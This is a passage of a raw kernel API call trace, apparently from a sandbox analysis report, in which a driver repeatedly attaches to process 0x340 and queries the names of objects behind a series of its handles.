(Object=0xffffe00069851840) returned 0x3ffde [0289.915] ObQueryNameString (in: Object=0xffffe000699156c0, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.915] ObfDereferenceObject (Object=0xffffe000699156c0) returned 0x7ffc [0289.915] IoCompleteRequest () returned 0x0 [0289.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.915] PsAcquireProcessExitSynchronization () returned 0x0 [0289.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.915] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699152c0, HandleInformation=0x0) returned 0x0 [0289.915] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.915] PsReleaseProcessExitSynchronization () returned 0x2 [0289.915] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffdd [0289.915] ObQueryNameString (in: Object=0xffffe000699152c0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.915] ObfDereferenceObject (Object=0xffffe000699152c0) returned 0x7fe8 [0289.915] IoCompleteRequest () returned 0x0 [0289.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.915] PsAcquireProcessExitSynchronization () returned 0x0 [0289.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.915] ObReferenceObjectByHandle (in: Handle=0x62c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699beda0, HandleInformation=0x0) returned 0x0 [0289.916] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.916] PsReleaseProcessExitSynchronization () returned 0x2 [0289.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffdc [0289.916] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.916] ObfDereferenceObject (Object=0xffffe000699beda0) returned 0x800b [0289.916] IoCompleteRequest () returned 0x0 [0289.916] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.916] PsAcquireProcessExitSynchronization () returned 0x0 [0289.916] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.916] ObReferenceObjectByHandle (in: Handle=0x654, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699c3310, HandleInformation=0x0) returned 0x0 [0289.916] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.916] PsReleaseProcessExitSynchronization () returned 0x2 [0289.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffdb [0289.916] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.916] ObfDereferenceObject (Object=0xffffe000699c3310) returned 0x8006 [0289.916] IoCompleteRequest () returned 0x0 [0289.916] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.916] PsAcquireProcessExitSynchronization () returned 0x0 [0289.916] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.916] ObReferenceObjectByHandle (in: Handle=0x688, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699c7dc0, HandleInformation=0x0) returned 0x0 [0289.916] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.916] PsReleaseProcessExitSynchronization () returned 0x2 [0289.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffda [0289.916] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.916] ObfDereferenceObject (Object=0xffffe000699c7dc0) returned 0x800b [0289.916] IoCompleteRequest () returned 0x0 [0289.916] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.916] PsAcquireProcessExitSynchronization () returned 0x0 [0289.916] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.916] ObReferenceObjectByHandle (in: Handle=0x690, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699c9900, HandleInformation=0x0) returned 0x0 [0289.916] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.916] PsReleaseProcessExitSynchronization () returned 0x2 [0289.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd9 [0289.916] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.916] ObfDereferenceObject (Object=0xffffe000699c9900) returned 0x800c [0289.916] IoCompleteRequest () returned 0x0 [0289.916] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.916] PsAcquireProcessExitSynchronization () returned 0x0 [0289.916] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.916] ObReferenceObjectByHandle (in: Handle=0x694, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699c93d0, HandleInformation=0x0) returned 0x0 [0289.916] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.916] PsReleaseProcessExitSynchronization () returned 0x2 [0289.916] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd8 [0289.916] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.916] ObfDereferenceObject (Object=0xffffe000699c93d0) returned 0x800e [0289.917] IoCompleteRequest () returned 0x0 [0289.917] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.917] PsAcquireProcessExitSynchronization () returned 0x0 [0289.917] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.917] ObReferenceObjectByHandle (in: Handle=0x698, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007ff97f20, HandleInformation=0x0) returned 0x0 [0289.917] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.917] PsReleaseProcessExitSynchronization () returned 0x2 [0289.917] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd7 [0289.917] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.917] ObfDereferenceObject (Object=0xffffe0007ff97f20) returned 0x7ffe [0289.917] IoCompleteRequest () returned 0x0 [0289.917] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.917] PsAcquireProcessExitSynchronization () returned 0x0 [0289.917] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.917] ObReferenceObjectByHandle (in: Handle=0x69c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699cadc0, HandleInformation=0x0) returned 0x0 [0289.917] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.917] PsReleaseProcessExitSynchronization () returned 0x2 [0289.917] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd6 [0289.917] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.917] ObfDereferenceObject (Object=0xffffe000699cadc0) returned 0x800e [0289.917] IoCompleteRequest () returned 0x0 [0289.917] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.917] PsAcquireProcessExitSynchronization () returned 0x0 [0289.917] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.917] ObReferenceObjectByHandle (in: Handle=0x6a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007fdfc4a0, HandleInformation=0x0) returned 0x0 [0289.917] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.918] PsReleaseProcessExitSynchronization () returned 0x2 [0289.918] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd5 [0289.918] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.918] ObfDereferenceObject (Object=0xffffe0007fdfc4a0) returned 0x8002 [0289.918] IoCompleteRequest () returned 0x0 [0289.918] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.918] PsAcquireProcessExitSynchronization () returned 0x0 [0289.918] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.918] ObReferenceObjectByHandle (in: Handle=0x6a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007ff97090, HandleInformation=0x0) returned 0x0 [0289.918] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.918] PsReleaseProcessExitSynchronization () returned 0x2 [0289.918] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd4 [0289.918] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.918] ObfDereferenceObject (Object=0xffffe0007ff97090) returned 0x800e [0289.918] IoCompleteRequest () returned 0x0 [0289.918] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.918] PsAcquireProcessExitSynchronization () returned 0x0 [0289.918] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.919] ObReferenceObjectByHandle (in: Handle=0x6a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699cb090, HandleInformation=0x0) returned 0x0 [0289.919] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.919] PsReleaseProcessExitSynchronization () returned 0x2 [0289.919] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd3 [0289.919] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.919] ObfDereferenceObject (Object=0xffffe000699cb090) returned 0x800e [0289.919] IoCompleteRequest () returned 0x0 [0289.919] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.919] PsAcquireProcessExitSynchronization () returned 0x0 [0289.919] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.919] ObReferenceObjectByHandle (in: Handle=0x6b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bdd090, HandleInformation=0x0) returned 0x0 [0289.919] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.919] PsReleaseProcessExitSynchronization () returned 0x2 [0289.919] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd2 [0289.919] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.919] ObfDereferenceObject (Object=0xffffe00069bdd090) returned 0x800e [0289.919] IoCompleteRequest () returned 0x0 [0289.919] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.919] PsAcquireProcessExitSynchronization () returned 0x0 [0289.919] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.919] ObReferenceObjectByHandle (in: Handle=0x6b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fcd760, HandleInformation=0x0) returned 0x0 [0289.919] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.919] PsReleaseProcessExitSynchronization () returned 0x2 [0289.919] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd1 [0289.919] ObQueryNameString (in: Object=0xffffe00069fcd760, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.919] ObfDereferenceObject (Object=0xffffe00069fcd760) returned 0x7fff [0289.919] IoCompleteRequest () returned 0x0 [0289.919] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.919] PsAcquireProcessExitSynchronization () returned 0x0 [0289.919] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.919] ObReferenceObjectByHandle (in: Handle=0x6d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b73090, HandleInformation=0x0) returned 0x0 [0289.919] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.919] PsReleaseProcessExitSynchronization () returned 0x2 [0289.919] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffd0 [0289.919] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.919] ObfDereferenceObject (Object=0xffffe00069b73090) returned 0x8008 [0289.919] IoCompleteRequest () returned 0x0 [0289.919] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.919] PsAcquireProcessExitSynchronization () returned 0x0 [0289.919] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.919] ObReferenceObjectByHandle (in: Handle=0x6e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069917f20, HandleInformation=0x0) returned 0x0 [0289.919] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.919] PsReleaseProcessExitSynchronization () returned 0x2 [0289.919] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffcf [0289.919] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.920] ObfDereferenceObject (Object=0xffffe00069917f20) returned 0x8007 [0289.920] IoCompleteRequest () returned 0x0 [0289.920] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.920] PsAcquireProcessExitSynchronization () returned 0x0 [0289.920] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.920] ObReferenceObjectByHandle (in: Handle=0x6f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069916d10, HandleInformation=0x0) returned 0x0 [0289.920] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.920] PsReleaseProcessExitSynchronization () returned 0x2 [0289.920] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffce [0289.920] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.920] ObfDereferenceObject (Object=0xffffe00069916d10) returned 0x800b [0289.920] IoCompleteRequest () returned 0x0 [0289.920] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.920] PsAcquireProcessExitSynchronization () returned 0x0 [0289.920] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.920] ObReferenceObjectByHandle (in: Handle=0x700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b87580, HandleInformation=0x0) returned 0x0 [0289.920] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.920] PsReleaseProcessExitSynchronization () returned 0x2 [0289.920] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffcd [0289.920] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6dd7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6dd7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.920] ObfDereferenceObject (Object=0xffffe00069b87580) returned 0x800b [0289.920] IoCompleteRequest () returned 0x0 [0289.920] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.920] PsAcquireProcessExitSynchronization () returned 0x0 [0289.920] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.920] ObReferenceObjectByHandle (in: Handle=0x70c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069be4f20, HandleInformation=0x0) returned 0x0 [0289.920] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.920] PsReleaseProcessExitSynchronization () returned 0x2 [0289.920] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffcc [0289.920] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.920] ObfDereferenceObject (Object=0xffffe00069be4f20) returned 0x800e [0289.920] IoCompleteRequest () returned 0x0 [0289.920] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.920] PsAcquireProcessExitSynchronization () returned 0x0 [0289.920] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.920] ObReferenceObjectByHandle (in: Handle=0x710, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069be3090, HandleInformation=0x0) returned 0x0 [0289.920] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.920] PsReleaseProcessExitSynchronization () returned 0x2 [0289.920] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffcb [0289.920] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.920] ObfDereferenceObject (Object=0xffffe00069be3090) returned 0x800c [0289.920] IoCompleteRequest () returned 0x0 [0289.920] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.920] PsAcquireProcessExitSynchronization () returned 0x0 [0289.921] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.921] ObReferenceObjectByHandle (in: Handle=0x718, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069be2090, HandleInformation=0x0) returned 0x0 [0289.921] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.921] PsReleaseProcessExitSynchronization () returned 0x2 [0289.921] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffca [0289.921] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.921] ObfDereferenceObject (Object=0xffffe00069be2090) returned 0x800e [0289.921] IoCompleteRequest () returned 0x0 [0289.921] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.921] PsAcquireProcessExitSynchronization () returned 0x0 [0289.921] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.921] ObReferenceObjectByHandle (in: Handle=0x71c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699e2910, HandleInformation=0x0) returned 0x0 [0289.921] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.921] PsReleaseProcessExitSynchronization () returned 0x2 [0289.921] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc9 [0289.921] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.921] ObfDereferenceObject (Object=0xffffe000699e2910) returned 0x800e [0289.921] IoCompleteRequest () returned 0x0 [0289.921] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.921] PsAcquireProcessExitSynchronization () returned 0x0 [0289.921] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.921] ObReferenceObjectByHandle (in: Handle=0x720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699fcaf0, HandleInformation=0x0) returned 0x0 [0289.921] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.921] PsReleaseProcessExitSynchronization () returned 0x2 [0289.921] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc8 [0289.921] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5067c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5067c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.921] ObfDereferenceObject (Object=0xffffe000699fcaf0) returned 0x800e [0289.921] IoCompleteRequest () returned 0x0 [0289.921] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.921] PsAcquireProcessExitSynchronization () returned 0x0 [0289.921] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.921] ObReferenceObjectByHandle (in: Handle=0x724, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699e3f20, HandleInformation=0x0) returned 0x0 [0289.921] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.921] PsReleaseProcessExitSynchronization () returned 0x2 [0289.921] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc7 [0289.921] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.921] ObfDereferenceObject (Object=0xffffe000699e3f20) returned 0x800a [0289.921] IoCompleteRequest () returned 0x0 [0289.921] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.921] PsAcquireProcessExitSynchronization () returned 0x0 [0289.921] KeStackAttachProcess (in: 